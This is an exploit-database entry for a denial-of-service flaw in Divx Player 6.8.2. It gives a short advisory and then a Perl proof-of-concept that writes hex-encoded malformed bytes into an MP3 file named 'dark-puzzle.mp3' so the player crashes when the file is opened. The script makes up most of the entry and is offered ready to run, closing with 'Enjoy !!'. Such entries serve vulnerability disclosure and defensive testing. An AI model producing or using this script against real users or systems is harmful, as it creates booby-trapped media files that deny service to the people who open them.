Divx Player 6.8.2 – Denial of Service

• Exploit Database
• 16 阅读

• 作者： Dark-Puzzle
  日期： 2012-08-20
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/37640/

• source: https://www.securityfocus.com/bid/55105/info
  
  Divx Player is prone to a denial-of-service vulnerability.
  
  An attacker can exploit this issue to cause the application to crash, denying service to legitimate users.
  
  Divx 6.8.2 is vulnerable; other versions may also be affected. 
  
  # usage : perl divxdOs.pl 
  my $id="\x55\x46\x49\x44\x20\x55\x6e\x69\x71\x75\x65\x20\x66\x69\x6c\x65\x20\x69\x64\x65\x6e\x74\x69\x66\x69\x65\x72\x0d\x0a\x55\x53\x45\x52\x20\x54\x65\x72\x6d\x73\x20\x6f\x66\x20\x75\x73\x65\x0d\x0a\x55\x53\x4c\x54\x20\x55\x6e\x73\x79\x6e\x63\x68\x72\x6f\x6e\x69\x7a\x65\x64\x20\x6c\x79\x72\x69\x63\x2f\x74\x65\x78\x74\x20\x74\x72\x61\x6e\x73\x63\x72\x69\x70\x74\x69\x6f\x6e";
  my $cdat= "\x0c\x0b\x0b\x0c\x19\x12\x13\x0f\x14\x1d\x1a\x1f\x1e\x1d\x1a\x1c\x1c\x20\x24\x2e\x27\x20\x22\x2c\x23\x1c\x1c\x28\x2b\x78\x29\x2c\x30\x27\x39\x3d\x30\x3c\x2e\x61\x78\x32\xc3\x83\xc2\xbf\xc3\x83\xef\xbf\xbd";
  
   
  my $file= "dark-puzzle.mp3";
  open($FILE,">$file");
  print $FILE $id.$cdat;
  close($FILE);
  print "MP3 File Created , Enjoy !!\n";